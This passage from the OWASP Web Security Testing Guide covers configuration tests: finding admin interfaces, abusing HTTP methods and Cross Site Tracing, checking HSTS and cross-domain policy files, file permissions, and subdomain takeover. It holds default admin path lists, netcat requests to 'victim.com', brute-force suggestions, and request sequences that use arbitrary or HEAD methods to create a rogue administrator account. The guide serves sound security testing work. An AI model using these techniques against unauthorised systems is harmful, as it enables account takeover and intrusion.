- Check carefully any other activity performed on file systems exposed by the web server, such as spot administration activities. For example, if you occasionally need to take a snapshot of a couple of directories (which you should not do on a production system), you may be tempted to zip them first. Be careful not to leave those archive files behind.
- Appropriate configuration management policies should help avoid leaving around obsolete and unreferenced files.
- Applications should be designed not to create (or rely on) files stored under the web directory trees served by the web server. Data files, log files, configuration files, etc. should be stored in directories not accessible by the web server, to counter the possibility of information disclosure (not to mention data modification if web directory permissions allow writing).
- File system snapshots should not be accessible via the web if the document root is on a file system using this technology. Configure your web server to deny access to such directories; for example, under Apache a Location directive such as this should be used:

<Location ~ ".snapshot">
  Order deny,allow
  Deny from all
</Location>

Enumerate Infrastructure and Application Admin Interfaces

ID
WSTG-CONF-05

Summary

Administrator interfaces may be present in the application or on the application server to allow certain users to undertake privileged activities on the site. Tests should be undertaken to reveal if and how this privileged functionality can be accessed by an unauthorized or standard user.

An application may require an administrator interface to enable a privileged user to access functionality that may make changes to how the site functions. Such changes may include:

- user account provisioning
- site design and layout
- data manipulation
- configuration changes

In many instances, such interfaces do not have sufficient controls to protect them from unauthorized access.
Testing is aimed at discovering these administrator interfaces and accessing functionality intended for the privileged users.

How to Test

Black-Box Testing

The following section describes vectors that may be used to test for the presence of administrative interfaces. These techniques may also be used to test for related issues, including privilege escalation, and are described elsewhere in this guide (for example, Testing for Bypassing Authorization Schema and Testing for Insecure Direct Object References) in greater detail.

- Directory and file enumeration. An administrative interface may be present but not visibly available to the tester. Attempting to guess the path of the administrative interface may be as simple as requesting /admin or /administrator, etc., or in some scenarios it can be revealed within seconds using Google dorks. There are many tools available to perform brute forcing of server contents; see the tools section below for more information. A tester may also have to identify the file name of the administration page. Forcibly browsing to the identified page may provide access to the interface.
- Comments and links in source code. Many sites use common code that is loaded for all site users. By examining all source sent to the client, links to administrator functionality may be discovered and should be investigated.
- Reviewing server and application documentation. If the application server or application is deployed in its default configuration, it may be possible to access the administration interface using information described in configuration or help documentation. Default password lists should be consulted if an administrative interface is found and credentials are required.
- Publicly available information. Many applications, such as WordPress, have default administrative interfaces.
- Alternative server port. Administration interfaces may be available on a different port on the host than the main application. For example, Apache Tomcat's administration interface can often be seen on port 8080.
- Parameter tampering. A GET or POST parameter or a cookie variable may be required to enable the administrator functionality. Clues to this include the presence of hidden fields such as:

<input type="hidden" name="admin" value="no">

or in a cookie:

Cookie: session_cookie; useradmin=0

https://www.exploit-db.com/google-hacking-database

Once an administrative interface has been discovered, a combination of the above techniques may be used to attempt to bypass authentication. If this fails, the tester may wish to attempt a brute force attack. In such an instance the tester should be aware of the potential for administrative account lockout if such functionality is present.

Gray-Box Testing

A more detailed examination of the server and application components should be undertaken to ensure hardening (i.e. administrator pages are not accessible to everyone through the use of IP filtering or other controls), and, where applicable, verification that all components do not use default credentials or configurations. Source code should be reviewed to ensure that the authorization and authentication model ensures clear separation of duties between normal users and site administrators. User interface functions shared between normal and administrator users should be reviewed to ensure clear separation between the drawing of such components and information leakage from such shared functionality.

Each web framework may have its own admin default pages or path. For example:

WebSphere:
/admin
/admin-authz.xml
/admin.conf
/admin.passwd
/admin/*
/admin/logon.jsp
/admin/secure/logon.jsp

PHP:
/phpinfo
/phpmyadmin/
/phpMyAdmin/
/mysqladmin/
/MySQLadmin
/MySQLAdmin
/login.php
/logon.php
/xmlrpc.php
/dbadmin

FrontPage:
/admin.dll
/admin.exe
/administrators.pwd
/author.dll
/author.exe
/author.log
/authors.pwd
/cgi-bin

WebLogic:
/AdminCaptureRootCA
/AdminClients
/AdminConnections
/AdminEvents
/AdminJDBC
/AdminLicense
/AdminMain
/AdminProps
/AdminRealm
/AdminThreads

WordPress:
wp-admin/
wp-admin/about.php
wp-admin/admin-ajax.php
wp-admin/admin-db.php
wp-admin/admin-footer.php
wp-admin/admin-functions.php
wp-admin/admin-header.php

Tools

- OWASP ZAP - Forced Browse is a currently maintained successor to OWASP's previous DirBuster project.
- THC-HYDRA is a tool that allows brute-forcing of many interfaces, including form-based HTTP authentication.
- A brute forcer is much better when it uses a good dictionary, for example the netsparker dictionary.

References

- Default Password list
- Default Password list
- FuzzDB can be used to brute force browse admin login paths
- Common admin or debugging
parameters

https://www.zaproxy.org/docs/desktop/addons/forced-browse/
https://github.com/vanhauser-thc/thc-hydra
https://www.netsparker.com/blog/web-security/svn-digger-better-lists-for-forced-browsing/
https://portforward.com/router-password/
https://cirt.net/passwords
https://github.com/fuzzdb-project/fuzzdb/blob/f801f5c5adc9aa5e54f20d273d213c5ab58826b9/discovery/predictable-filepaths/login-file-locations/Logins.fuzz.txt
https://github.com/fuzzdb-project/fuzzdb/blob/f801f5c5adc9aa5e54f20d273d213c5ab58826b9/attack/business-logic/CommonDebugParamNames.fuzz.txt

Test HTTP Methods

ID
WSTG-CONF-06

Summary

HTTP offers a number of methods that can be used to perform actions on the web server. Many of these methods are designed to aid developers in deploying and testing HTTP applications. These HTTP methods can be used for nefarious purposes if the web server is misconfigured. Additionally, Cross Site Tracing (XST), a form of cross site scripting using the server's HTTP TRACE method, is examined. While GET and POST are by far the most common methods used to access information provided by a web server, the Hypertext Transfer Protocol (HTTP) allows several other (and somewhat less known) methods. RFC 2616, which describes HTTP version 1.1, defines the following eight methods:

HEAD
GET
POST
PUT
DELETE
TRACE
OPTIONS
CONNECT

Some of these methods can potentially pose a security risk for a web application, as they allow an attacker to modify the files stored on the web server and, in some scenarios, steal the credentials of legitimate users. More specifically, the methods that should be disabled are the following:

- PUT: This method allows a client to upload new files on the web server. An attacker can exploit it by uploading malicious files (e.g. an asp file that executes commands by invoking cmd.exe), or by simply using the victim's server as a file repository.
- DELETE: This method allows a client to delete a file on the web server. An attacker can exploit it as a very simple and direct way to deface a web site or to mount a DoS attack.
- CONNECT: This method could allow a client to use the web server as a proxy.
- TRACE: This method simply echoes back to the client whatever string has been sent to the server, and is used mainly for debugging purposes. This method, originally assumed harmless, can be used to mount an attack known as Cross Site Tracing, which was discovered by Jeremiah Grossman (see links at the bottom of the page).

If an application needs one or more of these methods, such as REST web services (which may require PUT or DELETE), it is important to check that their usage is properly limited to trusted users and safe conditions.

Arbitrary HTTP Methods

Arshan Dabirsiaghi (see links) discovered that many web application frameworks allowed well-chosen or arbitrary HTTP methods to bypass an environment-level access control check:

- Many frameworks and languages treat "HEAD" as a "GET" request, albeit one without any body in the response. If a security constraint was set on "GET" requests such that only "authenticatedUsers" could access GET requests for a particular servlet or resource, it would be bypassed for the "HEAD" version. This allowed unauthorized blind submission of any privileged GET request.
- Some frameworks allowed arbitrary HTTP methods such as "JEFF" or "CATS" to be used without limitation. These were treated as if a "GET" method was issued, and were found not to be subject to method-based role access control checks in a number of languages and frameworks, again allowing unauthorized blind submission of privileged GET requests.
- In many cases, code which explicitly checked for a "GET" or "POST" method would be safe.

How to Test

Discover the Supported Methods

To perform this test, the tester needs some way to figure out which HTTP methods are supported by the web server that is being examined. The OPTIONS HTTP method provides the tester with the most direct and effective way to do that. RFC 2616 states that, "The OPTIONS method represents a request for information about the communication options available on the request/response chain identified by the Request-URI".

The testing method is extremely straightforward and we only need to fire up netcat (or telnet):

$ nc www.victim.com 80
OPTIONS / HTTP/1.1
Host: www.victim.com

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 31 Oct 2006 08:00:29 GMT
Connection: close
Allow: GET, HEAD, POST, TRACE, OPTIONS
Content-Length: 0

As we can see in the example, OPTIONS provides a list of the methods that are supported by the web server, and in this case we can see that the TRACE method is enabled.
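When scripting this check, the Allow header returned by OPTIONS can be parsed and compared against the methods discussed above; a small illustrative helper:

```python
# Methods that generally warrant further investigation (per the list above).
RISKY_METHODS = {"PUT", "DELETE", "TRACE", "CONNECT"}

def risky_from_allow(allow_header):
    """Return the risky methods advertised in an Allow header value."""
    advertised = {m.strip().upper() for m in allow_header.split(",") if m.strip()}
    return sorted(advertised & RISKY_METHODS)
```

For the response above, `risky_from_allow("GET, HEAD, POST, TRACE, OPTIONS")` flags TRACE.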
The danger posed by this method is illustrated in the following section.

The same test can also be executed using nmap and the http-methods NSE script:

C:\Tools\nmap-6.40>nmap -p 443 --script http-methods localhost

Starting Nmap 6.40 ( http://nmap.org ) at 2015-11-04 11:52 Romance Standard Time
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0094s latency).
PORT STATE SERVICE
443/tcp open https
| http-methods: OPTIONS TRACE GET HEAD POST
| Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html

Nmap done: 1 IP address (1 host up) scanned in 20.48 seconds

Test XST Potential

Note: in order to understand the logic and the goals of this attack one must be familiar with Cross Site Scripting attacks.

The TRACE method, while apparently harmless, can be successfully leveraged in some scenarios to steal legitimate users' credentials. This attack technique was discovered by Jeremiah Grossman in 2003, in an attempt to bypass the HttpOnly attribute that Microsoft introduced in Internet Explorer 6 SP1 to protect cookies from being accessed by JavaScript. As a matter of fact, one of the most recurring attack patterns in Cross Site Scripting is to access the document.cookie object and send it to a web server controlled by the attacker so that he or she can hijack the victim's session. Tagging a cookie as HttpOnly forbids JavaScript from accessing it, protecting it from being sent to a third party. However, the TRACE method can be used to bypass this protection and access the cookie even in this scenario.

https://owasp.org/www-community/attacks/xss/
https://owasp.org/www-community/HttpOnly

As mentioned before, TRACE simply returns any string that is sent to the web server. In order to verify its presence (or to double-check the results of the OPTIONS request shown above), the tester can proceed as shown in the following example:

$ nc www.victim.com 80
TRACE / HTTP/1.1
Host: www.victim.com

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 31 Oct 2006 08:01:48 GMT
Connection: close
Content-Type: message/http
Content-Length: 39

TRACE / HTTP/1.1
Host: www.victim.com

The response body is exactly a copy of our original request, meaning that the target allows this method. Now, where is the danger lurking? If the tester instructs a browser to issue a TRACE request to the web server, and this browser has a cookie for that domain, the cookie will be automatically included in the request headers, and will therefore be echoed back in the resulting response. At that point, the cookie string will be accessible by JavaScript and it will finally be possible to send it to a third party even when the cookie is tagged as HttpOnly.

There are multiple ways to make a browser issue a TRACE request, such as the XMLHTTP ActiveX control in Internet Explorer and XMLDOM in Mozilla and Netscape. However, for security reasons the browser is allowed to start a connection only to the domain where the hostile script resides. This is a mitigating factor, as the attacker needs to combine the TRACE method with another vulnerability in order to mount the attack.

An attacker has two ways to successfully launch a Cross Site Tracing attack:

- Leveraging another server-side vulnerability: the attacker injects the hostile JavaScript snippet containing the TRACE request into the vulnerable application, as in a normal Cross Site Scripting attack.
- Leveraging a client-side vulnerability: the attacker creates a malicious website containing the hostile JavaScript snippet and exploits some cross-domain vulnerability of the victim's browser, in order to make the JavaScript code successfully perform a connection to the site that supports the TRACE method and that originated the cookie the attacker is trying to steal.

More detailed information, together with code samples, can be found in the original whitepaper written by Jeremiah Grossman.

Testing for Arbitrary HTTP Methods

Find a page to visit that has a security constraint such that it would normally force a 302 redirect to a log in page or force a log in directly. The test URL in this example works like this, as do many web applications. However, if a tester obtains a "200" response that is not a log in page, it is possible to bypass authentication and thus authorization.

$ nc www.example.com 80
JEFF / HTTP/1.1
Host: www.example.com

HTTP/1.1 200 OK
Date: Mon, 18 Aug 2008 22:38:40 GMT
Server: Apache
Set-Cookie: PHPSESSID=K53QW...

If the framework or firewall or application does not support the "JEFF" method, it should issue an error page (or preferably a 405 Not Allowed or 501 Not Implemented error page).
If it services the request, it is vulnerable to this issue.

If the tester feels that the system is vulnerable to this issue, they should issue CSRF-like attacks to exploit the issue more fully:

FOOBAR /admin/createUser.php?member=myAdmin
JEFF /admin/changePw.php?member=myAdmin&passwd=foo123&confirm=foo123
CATS /admin/groupEdit.php?group=Admins&member=myAdmin&action=add

With some luck, using the above three commands - modified to suit the application under test and testing requirements - a new user would be created, a password assigned, and the user made an administrator.

Testing for HEAD Access Control Bypass

Find a page to visit that has a security constraint such that it would normally force a 302 redirect to a log in page or force a log in directly. The test URL in this example works like this, as do many web applications. However, if the tester obtains a "200" response that is not a login page, it is possible to bypass authentication and thus authorization.

$ nc www.example.com 80
HEAD /admin HTTP/1.1
Host: www.example.com

HTTP/1.1 200 OK
Date: Mon, 18 Aug 2008 22:44:11 GMT
Server: Apache
Set-Cookie: PHPSESSID=pKi...; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: adminOnlyCookie1=...; expires=Tue, 18-Aug-2009 22:44:31 GMT; domain=www.example.com
Set-Cookie: adminOnlyCookie2=...; expires=Mon, 18-Aug-2008 22:54:31 GMT; domain=www.example.com
Set-Cookie: adminOnlyCookie3=...; expires=Sun, 19-Aug-2007 22:44:30 GMT; domain=www.example.com
Content-Language: EN
Connection: close
Content-Type: text/html; charset=ISO-8859-1

If the tester gets a "405 Method Not Allowed" or "501 Method Unimplemented" response, the target (application/framework/language/system/firewall) is working correctly.
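The verdict logic described here can be condensed into a small, hypothetical helper (status-code interpretation only; a real test still needs to inspect the response body, as noted below):

```python
def head_bypass_verdict(status):
    """Classify the response status to an out-of-policy HEAD request."""
    if status in (405, 501):
        return "rejected"          # method refused: the control is working
    if status == 200:
        return "possible bypass"   # may have been processed without auth; investigate
    return "inconclusive"          # e.g. a 302 redirect to the login page
```

This is a triage aid, not a proof: a 200 may still be a login or error page served with the wrong status.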
If a “200” response code comes back, and the</p><p>response contains no body, it’s likely that the application has processed the request without authentication or</p><p>authorization and further testing is warranted.</p><p>If the tester thinks that the system is vulnerable to this issue, they should issue CSRF-like attacks to exploit the issue</p><p>more fully:</p><p>HEAD /admin/createUser.php?member=myAdmin</p><p>HEAD /admin/changePw.php?member=myAdmin&passwd=foo123&confirm=foo123</p><p>HEAD /admin/groupEdit.php?group=Admins&member=myAdmin&action=add</p><p>With some luck, using the above three commands - modified to suit the application under test and testing requirements</p><p>- a new user would be created, a password assigned, and made an administrator, all using blind request submission.</p><p>Tools</p><p>NetCat</p><p>cURL</p><p>nmap http-methods NSE script</p><p>http://nc110.sourceforge.net/</p><p>https://curl.haxx.se/</p><p>https://nmap.org/nsedoc/scripts/http-methods.html</p><p>Web Security Testing Guide v4.1</p><p>115</p><p>References</p><p>Whitepapers</p><p>RFC 2616: “Hypertext Transfer Protocol – HTTP/1.1”</p><p>RFC 2109 and RFC 2965: “HTTP State Management Mechanism”</p><p>Jeremiah Grossman: “Cross Site Tracing (XST)</p><p>Amit Klein: “XS(T) attack variants which can, in some cases, eliminate the need for TRACE”</p><p>https://tools.ietf.org/html/rfc2616</p><p>https://tools.ietf.org/html/rfc2109</p><p>https://tools.ietf.org/html/rfc2965</p><p>https://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf</p><p>https://www.securityfocus.com/archive/107/308433</p><p>Web Security Testing Guide v4.1</p><p>116</p><p>Test HTTP Strict Transport Security</p><p>ID</p><p>WSTG-CONF-07</p><p>Summary</p><p>The HTTP Strict Transport Security (HSTS) header is a mechanism that web sites have to communicate to the web</p><p>browsers</p><p>that all traffic exchanged with a given domain must always be sent over https, this will help protect the</p><p>information 
from being passed over unencrypted requests.</p><p>Considering the importance of this security measure, it is important to verify that the web site is using this HTTP header,</p><p>in order to ensure that all the data travels encrypted from the web browser to the server.</p><p>The HTTP Strict Transport Security (HSTS) feature lets a web application inform the browser, through the use of a</p><p>special response header, that it should never establish a connection to the specified domain servers using HTTP.</p><p>Instead, it should automatically establish all connection requests to access the site through HTTPS.</p><p>The HTTP strict transport security header uses two directives:</p><p>max-age: to indicate the number of seconds during which the browser should automatically convert all HTTP requests to</p><p>HTTPS.</p><p>includeSubDomains: to indicate that all of the web application’s sub-domains must use HTTPS.</p><p>Here’s an example of the HSTS header implementation:</p><p>Strict-Transport-Security: max-age=60000; includeSubDomains</p><p>The use of this header by web applications must be checked to determine whether the following security issues could arise:</p><p>Attackers sniffing the network traffic and accessing the information transferred through an unencrypted channel.</p><p>Attackers exploiting a man-in-the-middle attack because of the problem of accepting certificates that are not trusted.</p><p>Users who mistakenly entered an address in the browser using HTTP instead of HTTPS, or users who click on a</p><p>link in a web application which mistakenly indicated the HTTP protocol.</p><p>How to Test</p><p>Testing for the presence of the HSTS header can be done by checking for its existence in the server’s</p><p>response in an interception proxy, or by using curl as follows:</p><p>$ curl -s -D- https://owasp.org | grep Strict</p><p>Strict-Transport-Security: max-age=15768000</p><p>References</p><p>OWASP HTTP Strict Transport Security</p><p>OWASP Appsec 
Tutorial Series - Episode 4: Strict Transport Security</p><p>HSTS Specification</p><p>https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html</p><p>https://www.youtube.com/watch?v=zEV3HOuM_Vw</p><p>https://tools.ietf.org/html/rfc6797</p><p>Test RIA Cross Domain Policy</p><p>ID</p><p>WSTG-CONF-08</p><p>Summary</p><p>Rich Internet Applications (RIA) have adopted Adobe’s crossdomain.xml policy files to allow for controlled cross</p><p>domain access to data and service consumption using technologies such as Oracle Java, Silverlight, and Adobe Flash.</p><p>Therefore, a domain can grant remote access to its services from a different domain. However, often the policy files that</p><p>describe the access restrictions are poorly configured. Poor configuration of the policy files enables Cross-site Request</p><p>Forgery attacks, and may allow third parties to access sensitive data meant for the user.</p><p>What are cross-domain policy files?</p><p>A cross-domain policy file specifies the permissions that a web client such as Java, Adobe Flash, Adobe Reader, etc.</p><p>uses to access data across different domains. For Silverlight, Microsoft adopted a subset of Adobe’s</p><p>crossdomain.xml, and additionally created its own cross-domain policy file: clientaccesspolicy.xml.</p><p>Whenever a web client detects that a resource has to be requested from another domain, it will first look for a policy file in</p><p>the target domain to determine if performing cross-domain requests, including headers, and socket-based connections</p><p>are allowed.</p><p>Master policy files are located at the domain’s root. A client may be instructed to load a different policy file but it will</p><p>always check the master policy file first to ensure that the master policy file permits the requested policy file.</p><p>Crossdomain.xml vs. Clientaccesspolicy.xml</p><p>Most RIA applications support crossdomain.xml. 
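A retrieved crossdomain.xml can be screened automatically for overly permissive entries of the kind discussed in this section. A heuristic Python sketch follows; the flagging rules are illustrative, not a complete audit:

```python
# Flag risky settings in a crossdomain.xml policy (heuristic, not exhaustive).
import xml.etree.ElementTree as ET

def risky_entries(policy_xml: str) -> list:
    """Return findings for wildcard or insecure entries in a policy file."""
    findings = []
    for elem in ET.fromstring(policy_xml).iter():
        if elem.get("domain") == "*":
            findings.append(f"wildcard domain in <{elem.tag}>")
        if elem.get("secure") == "false":
            findings.append(f'secure="false" in <{elem.tag}>')
        if elem.tag == "site-control" and \
           elem.get("permitted-cross-domain-policies") == "all":
            findings.append("site-control permits all policy files")
    return findings

# The overly permissive example from this section, minus the DOCTYPE:
permissive = """<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>"""
```

Each finding then needs manual review against the least privilege principle; a wildcard is not always a vulnerability, but it always warrants a closer look.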
However, in the case of Silverlight, it will only work if the</p><p>crossdomain.xml specifies that access is allowed from any domain. For more granular control with Silverlight,</p><p>clientaccesspolicy.xml must be used.</p><p>Policy files grant several types of permissions:</p><p>Accepted policy files (Master policy files can disable or restrict specific policy files)</p><p>Sockets permissions</p><p>Header permissions</p><p>HTTP/HTTPS access permissions</p><p>Allowing access based on cryptographic credentials</p><p>An example of an overly permissive policy file:</p><p><?xml version="1.0"?></p><p><!DOCTYPE cross-domain-policy SYSTEM</p><p>"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"></p><p><cross-domain-policy></p><p><site-control permitted-cross-domain-policies="all"/></p><p><allow-access-from domain="*" secure="false"/></p><p><allow-http-request-headers-from domain="*" headers="*" secure="false"/></p><p></cross-domain-policy></p><p>How can cross-domain policy files be abused?</p><p>Overly permissive cross-domain policies.</p><p>Generating server responses that may be treated as cross-domain policy files.</p><p>Using file upload functionality to upload files that may be treated as cross-domain policy files.</p><p>Impact of Abusing Cross-Domain Access</p><p>Defeat CSRF protections.</p><p>Read data restricted or otherwise protected by cross-origin policies.</p><p>How to Test</p><p>Testing for RIA Policy Files Weakness</p><p>To test for RIA policy file weakness, the tester should try to retrieve the policy files crossdomain.xml and</p><p>clientaccesspolicy.xml from the application’s root, and from every folder found.</p><p>For example, if the application’s URL is http://www.owasp.org , the tester should try to download the files</p><p>http://www.owasp.org/crossdomain.xml and http://www.owasp.org/clientaccesspolicy.xml .</p><p>After retrieving all the policy files, the permissions allowed should be 
checked under the least privilege principle.</p><p>Requests should only come from the domains, ports, or protocols that are necessary. Overly permissive policies should</p><p>be avoided. Policies with * in them should be closely examined.</p><p>Example</p><p><cross-domain-policy></p><p><allow-access-from domain="*" /></p><p></cross-domain-policy></p><p>Result Expected</p><p>A list of policy files found.</p><p>A list of weak settings in the policies.</p><p>Tools</p><p>Nikto</p><p>OWASP Zed Attack Proxy Project</p><p>W3af</p><p>References</p><p>Whitepapers</p><p>UCSD: Analyzing the Crossdomain Policies of Flash Applications</p><p>Adobe: “Cross-domain policy file specification”</p><p>Adobe: “Cross-domain policy file usage recommendations for Flash Player”</p><p>Oracle: “Cross-Domain XML Support”</p><p>MSDN: “Making a Service Available Across Domain Boundaries”</p><p>MSDN: “Network Security Access Restrictions in Silverlight”</p><p>Stefan Esser: “Poking new holes with Flash Crossdomain Policy Files”</p><p>Jeremiah Grossman: “Crossdomain.xml Invites Cross-site Mayhem”</p><p>Google Doctype: “Introduction to Flash security”</p><p>http://cseweb.ucsd.edu/~hovav/dist/crossdomain.pdf</p><p>http://www.adobe.com/devnet/articles/crossdomain_policy_file_spec.html</p><p>http://www.adobe.com/devnet/flashplayer/articles/cross_domain_policy.html</p><p>http://www.oracle.com/technetwork/java/javase/plugin2-142482.html#CROSSDOMAINXML</p><p>http://msdn.microsoft.com/en-us/library/cc197955(v=vs.95).aspx</p><p>http://msdn.microsoft.com/en-us/library/cc645032(v=vs.95).aspx</p><p>http://www.hardened-php.net/library/poking_new_holes_with_flash_crossdomain_policy_files.html</p><p>http://jeremiahgrossman.blogspot.com/2008/05/crossdomainxml-invites-cross-site.html</p><p>http://code.google.com/p/doctype-mirror/wiki/ArticleFlashSecurity</p><p>Web Security Testing Guide v4.1</p><p>119</p><p>Test File Permission</p><p>ID</p><p>WSTG-CONF-09</p><p>Summary</p><p>When a resource is given a permissions 
setting that provides access to a wider range of actors than required, it could</p><p>lead to the exposure of sensitive information, or the modification of that resource by unintended parties. This is</p><p>especially dangerous when the resource is related to program configuration, execution, or sensitive user data.</p><p>A clear example is an executable file that can be run by unauthorized users. For another example, account</p><p>information or a token value to access an API - increasingly seen in modern web services or microservices - may be</p><p>stored in a configuration file whose permissions are set to world-readable from</p><p>the installation by default. Such</p><p>sensitive data can be exposed by internal malicious actors of the host or by a remote attacker who compromised the</p><p>service with other vulnerabilities but obtained only a normal user privilege.</p><p>How to Test</p><p>In Linux, use the ls command to check file permissions. Alternatively, namei can also be used to recursively list file</p><p>permissions.</p><p>$ namei -l /PathToCheck/</p><p>The files and directories that require file permission testing include but are not limited to:</p><p>Web files/directory</p><p>Configuration files/directory</p><p>Sensitive files (encrypted data, password, key)/directory</p><p>Log files (security logs, operation logs, admin logs)/directory</p><p>Executables (scripts, EXE, JAR, class, PHP, ASP)/directory</p><p>Database files/directory</p><p>Temp files/directory</p><p>Upload files/directory</p><p>Tools</p><p>Windows AccessEnum</p><p>Windows AccessChk</p><p>Linux namei</p><p>Remediation</p><p>Set the permissions of the files and directories properly so that unauthorized users cannot access critical resources</p><p>unnecessarily.</p><p>References</p><p>CWE-732: Incorrect Permission Assignment for Critical 
Resource</p><p>https://technet.microsoft.com/en-us/sysinternals/accessenum</p><p>https://technet.microsoft.com/en-us/sysinternals/accesschk</p><p>https://linux.die.net/man/1/namei</p><p>https://cwe.mitre.org/data/definitions/732.html</p><p>Test for Subdomain Takeover</p><p>ID</p><p>WSTG-CONF-10</p><p>Summary</p><p>A successful exploitation of this kind of vulnerability allows an adversary to claim and take control of the victim’s</p><p>subdomain. This attack relies on the following:</p><p>1. The victim’s external DNS server subdomain record is configured to point to a non-existing or non-active</p><p>resource/external service/endpoint. The proliferation of XaaS (Anything as a Service) products and public cloud</p><p>services offers a lot of potential targets to consider.</p><p>2. The service provider hosting the resource/external service/endpoint does not handle subdomain ownership</p><p>verification properly.</p><p>If the subdomain takeover is successful, a wide variety of attacks are possible (serving malicious content, phishing,</p><p>stealing user session cookies, credentials, etc.). This vulnerability could be exploited for a wide variety of DNS resource</p><p>records including: A, CNAME, MX, NS, etc. In terms of attack severity, an NS subdomain takeover (although less</p><p>likely) has the highest impact because a successful attack could result in full control over the whole DNS zone and the</p><p>victim’s domain.</p><p>Example 1 - GitHub</p><p>1. The victim (victim.com) uses GitHub for development and configured a DNS record (coderepo.victim.com) to</p><p>access it.</p><p>2. The victim decides to migrate their code repository from GitHub to a commercial platform and does not remove</p><p>coderepo.victim.com from their DNS server.</p><p>3. 
An adversary finds out that coderepo.victim.com is hosted on GitHub and uses GitHub Pages to claim</p><p>coderepo.victim.com using his/her GitHub account.</p><p>Example 2 - Expired Domain</p><p>1. The victim (victim.com) owns another domain (victimotherdomain.com) and uses a CNAME record (www) to</p><p>reference the other domain ( www.victim.com –> victimotherdomain.com )</p><p>2. At some point, victimotherdomain.com expires and is available for registration by anyone. Since the CNAME</p><p>record is not deleted from the victim.com DNS zone, anyone who registers victimotherdomain.com has full</p><p>control over www.victim.com as long as the DNS record is present.</p><p>How to Test</p><p>Black-Box Testing</p><p>The first step is to enumerate the victim DNS servers and resource records. There are multiple ways to accomplish this</p><p>task, for example DNS enumeration using a dictionary of common subdomains, DNS brute force, or using web</p><p>search engines and other OSINT data sources.</p><p>Using the dig command, the tester looks for the following DNS server response messages that warrant further</p><p>investigation: NXDOMAIN|SERVFAIL|REFUSED|no servers could be reached.</p><p>Testing DNS A, CNAME Record Subdomain Takeover</p><p>Perform a basic DNS enumeration on the victim’s domain (victim.com) using dnsrecon:</p><p>$ ./dnsrecon.py -d victim.com</p><p>[*] Performing General Enumeration of Domain: victim.com</p><p>...</p><p>[-] DNSSEC is not configured for victim.com</p><p>[*] A subdomain.victim.com 192.30.252.153</p><p>[*] CNAME subdomain1.victim.com fictioussubdomain.victim.com</p><p>...</p><p>Identify which DNS resource records are dead and point to inactive or unused services. 
Using the dig command for the</p><p>CNAME record:</p><p>$ dig CNAME fictioussubdomain.victim.com</p><p>; <<>> DiG 9.10.3-P4-Ubuntu <<>> ns victim.com</p><p>;; global options: +cmd</p><p>;; Got answer:</p><p>;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 42950</p><p>;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1</p><p>The following DNS responses warrant further investigation: NXDOMAIN</p><p>To test the A record, the tester performs a whois database lookup and identifies GitHub as the service provider:</p><p>$ whois 192.30.252.153 | grep "OrgName"</p><p>OrgName: GitHub, Inc.</p><p>The tester visits subdomain.victim.com or issues an HTTP GET request, which returns a “404 - File not found” response,</p><p>a clear indication of the vulnerability.</p><p>Figure 4.2.10-1: GitHub 404 File Not Found response</p><p>The tester claims the domain using GitHub Pages:</p><p>Figure 4.2.10-2: GitHub claim domain</p><p>Testing NS Record Subdomain Takeover</p><p>Identify all nameservers for the domain in scope:</p><p>$ dig ns victim.com +short</p><p>ns1.victim.com</p><p>nameserver.expireddomain.com</p><p>In this fictitious example, the tester checks if the domain expireddomain.com is active with a domain registrar search. If</p><p>the domain is available for purchase, the subdomain is vulnerable.</p><p>The following DNS responses warrant further investigation: SERVFAIL/REFUSED</p><p>Gray-Box Testing</p><p>The tester has the DNS zone file available, which means DNS enumeration is not necessary. The testing methodology</p><p>is the same.</p><p>Remediation</p><p>To mitigate the risk of subdomain takeover, the vulnerable DNS resource record(s) should be removed from the DNS</p><p>zone. Continuous monitoring and periodic checks are recommended as best practice.</p><p>References</p><p>1. HackerOne - A Guide To Subdomain Takeovers</p><p>2. Subdomain Takeover: Basics</p><p>3. 
Subdomain Takeover: Going beyond CNAME</p><p>4. OWASP AppSec Europe 2017 - Frans Rosén: DNS hijacking using cloud providers – no verification needed</p><p>https://www.hackerone.com/blog/Guide-Subdomain-Takeovers</p><p>https://0xpatrik.com/subdomain-takeover-basics/</p><p>https://0xpatrik.com/subdomain-takeover-ns/</p><p>https://2017.appsec.eu/presos/Developer/DNS%20hijacking%20using%20cloud%20providers%20%E2%80%93%20no%20verification%20needed%20-%20Frans%20Rosen%20-%20OWASP_AppSec-Eu_2017.pdf</p><p>Tools</p><p>1. dig - man page</p><p>2. recon-ng - Web Reconnaissance framework</p><p>3. theHarvester - OSINT intelligence gathering tool</p><p>4. Sublist3r - OSINT subdomain enumeration tool</p><p>5. dnsrecon - DNS Enumeration Script</p><p>6. OWASP Amass DNS enumeration</p><p>https://linux.die.net/man/1/dig</p><p>https://github.com/lanmaster53/recon-ng</p><p>https://github.com/laramies/theHarvester</p><p>https://github.com/aboul3la/Sublist3r</p><p>https://github.com/darkoperator/dnsrecon</p><p>https://github.com/OWASP/Amass</p><p>Test Cloud Storage</p><p>ID</p><p>WSTG-CONF-11</p><p>Summary</p><p>Cloud storage services enable web applications and services to store and access objects in the storage service.</p><p>Improper access control configuration, however, may result in sensitive information exposure, data tampering, or</p><p>unauthorized access.</p><p>A known example is where an Amazon S3 bucket is misconfigured, although other cloud storage services may also</p><p>be exposed to similar risks. By default, all S3 buckets are private and can be accessed only by users that are explicitly</p><p>granted access. Users can grant public access to both the bucket itself and to individual objects stored within that</p><p>bucket. 
